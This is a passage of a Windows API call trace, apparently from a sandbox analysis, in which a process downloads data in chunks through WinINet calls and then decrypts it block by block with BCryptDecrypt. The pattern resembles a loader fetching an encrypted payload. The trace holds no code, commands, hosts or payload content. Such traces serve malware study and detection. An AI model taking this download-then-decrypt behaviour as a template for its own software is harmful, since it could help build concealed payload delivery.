lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.309] GetProcessHeap () returned 0x440000 [0169.309] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x2ee29) returned 0x202b010 [0169.309] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.310] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2057e39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2057e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.310] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.310] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.310] GetProcessHeap () returned 0x440000 [0169.310] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x2fe29) returned 0x202b010 [0169.310] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.310] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2059e39, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2059e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.311] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.311] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.311] GetProcessHeap () returned 0x440000 [0169.311] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x30e29) returned 0x202b010 [0169.311] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.311] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x205ae39, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x205ae39*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.311] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.311] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.312] GetProcessHeap () returned 0x440000 [0169.312] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x32e29) returned 0x202b010 [0169.312] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.312] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x205be39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x205be39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.312] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.312] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.313] GetProcessHeap () returned 0x440000 [0169.313] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x34e29) returned 0x202b010 [0169.313] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.313] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x205de39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x205de39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.313] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.313] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.314] GetProcessHeap () returned 0x440000 [0169.314] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x36e29) returned 0x202b010 [0169.314] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.314] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x205fe39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x205fe39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.314] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.314] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.315] GetProcessHeap () returned 0x440000 [0169.315] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x37e29) returned 0x202b010 [0169.315] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.315] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2061e39, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2061e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.315] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.315] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.316] GetProcessHeap () returned 0x440000 [0169.316] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x38e29) returned 0x202b010 [0169.316] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.316] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2062e39, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2062e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.316] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.316] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.317] GetProcessHeap () returned 0x440000 [0169.317] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x3ae29) returned 0x202b010 [0169.318] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.318] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2063e39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2063e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.318] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.318] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.318] GetProcessHeap () returned 0x440000 [0169.318] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x3ce29) returned 0x202b010 [0169.318] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.318] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2065e39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2065e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.319] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.319] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.319] GetProcessHeap () returned 0x440000 [0169.319] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x3ee29) returned 0x202b010 [0169.319] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.319] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2067e39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2067e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.320] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.320] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.320] GetProcessHeap () returned 0x440000 [0169.320] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x3fe29) returned 0x202b010 [0169.320] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.320] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2069e39, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x2069e39*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.320] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.320] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.322] GetProcessHeap () returned 0x440000 [0169.322] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x40e29) returned 0x202b010 [0169.322] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.322] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x206ae39, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x206ae39*, lpdwNumberOfBytesRead=0x14f8a4*=0x1000) returned 1 [0169.322] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.322] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.323] GetProcessHeap () returned 0x440000 [0169.323] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x42e29) returned 0x202b010 [0169.323] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.323] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x206be39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x206be39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.323] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.323] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.323] GetProcessHeap () returned 0x440000 [0169.323] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x44e29) returned 0x202b010 [0169.324] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.324] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x206de39, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x206de39*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.324] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.324] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.325] GetProcessHeap () returned 0x440000 [0169.325] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x202b010, Size=0x46e29) returned 0x1e65cd0 [0169.331] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.331] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1eaaaf9, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x1eaaaf9*, lpdwNumberOfBytesRead=0x14f8a4*=0x2000) returned 1 [0169.331] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.331] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.331] GetProcessHeap () returned 0x440000 [0169.331] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x1e65cd0, Size=0x47a00) returned 0x1e65cd0 [0169.332] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0169.332] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1eacaf9, dwNumberOfBytesToRead=0xbd7, lpdwNumberOfBytesRead=0x14f8a4 | out: lpBuffer=0x1eacaf9*, lpdwNumberOfBytesRead=0x14f8a4*=0xbd7) returned 1 [0169.579] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetQueryDataAvailable") returned 0x7ffc51094890 [0169.579] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x14f8a0, dwFlags=0x0, dwContext=0x0) returned 1 [0169.589] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetCloseHandle") returned 0x7ffc510af7f0 [0169.589] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0169.590] GetProcessHeap () returned 0x440000 [0169.590] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x448c2) returned 0x202b010 [0169.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.591] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e65cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202b010, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202b010, pcbResult=0x14f8fc) returned 0x0 [0169.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.594] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e65dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202b105, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202b105, pcbResult=0x14f8fc) returned 0x0 [0169.596] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.596] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e65ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202b1fa, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202b1fa, pcbResult=0x14f8fc) returned 0x0 [0169.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.598] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e65fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202b2ef, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202b2ef, pcbResult=0x14f8fc) returned 0x0 [0169.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.600] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e660d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202b3e4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202b3e4, pcbResult=0x14f8fc) returned 0x0 [0169.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.601] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e661d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202b4d9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202b4d9, pcbResult=0x14f8fc) returned 0x0 [0169.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.603] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e662d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202b5ce, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202b5ce, pcbResult=0x14f8fc) returned 0x0 [0169.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.604] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e663d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202b6c3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202b6c3, pcbResult=0x14f8fc) returned 0x0 [0169.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.606] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e664d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202b7b8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202b7b8, pcbResult=0x14f8fc) returned 0x0 [0169.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.610] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e665d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202b8ad, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202b8ad, pcbResult=0x14f8fc) returned 0x0 [0169.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.611] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e666d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202b9a2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202b9a2, pcbResult=0x14f8fc) returned 0x0 [0169.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.613] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e667d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202ba97, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202ba97, pcbResult=0x14f8fc) returned 0x0 [0169.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.614] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e668d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202bb8c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202bb8c, pcbResult=0x14f8fc) returned 0x0 [0169.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.819] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e669d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202bc81, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202bc81, pcbResult=0x14f8fc) returned 0x0 [0169.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.821] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e66ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202bd76, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202bd76, pcbResult=0x14f8fc) returned 0x0 [0169.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.823] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e66bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202be6b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202be6b, pcbResult=0x14f8fc) returned 0x0 [0169.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.826] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e66cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202bf60, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202bf60, pcbResult=0x14f8fc) returned 0x0 [0169.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.828] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e66dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202c055, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202c055, pcbResult=0x14f8fc) returned 0x0 [0169.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.830] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e66ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202c14a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202c14a, pcbResult=0x14f8fc) returned 0x0 [0169.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.833] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e66fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202c23f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202c23f, pcbResult=0x14f8fc) returned 0x0 [0169.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.835] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e670d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202c334, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202c334, pcbResult=0x14f8fc) returned 0x0 [0169.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.837] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e671d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202c429, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202c429, pcbResult=0x14f8fc) returned 0x0 [0169.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.839] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e672d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202c51e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202c51e, pcbResult=0x14f8fc) returned 0x0 [0169.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.841] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e673d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202c613, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202c613, pcbResult=0x14f8fc) returned 0x0 [0169.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.844] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e674d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202c708, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202c708, pcbResult=0x14f8fc) returned 0x0 [0169.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.846] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e675d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202c7fd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202c7fd, pcbResult=0x14f8fc) returned 0x0 [0169.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.848] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e676d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202c8f2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202c8f2, pcbResult=0x14f8fc) returned 0x0 [0169.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.851] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e677d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202c9e7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202c9e7, pcbResult=0x14f8fc) returned 0x0 [0169.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0169.853] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e678d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202cadc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202cadc, pcbResult=0x14f8fc) returned 0x0 [0170.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.125] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e679d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202cbd1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202cbd1, pcbResult=0x14f8fc) returned 0x0 [0170.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.127] 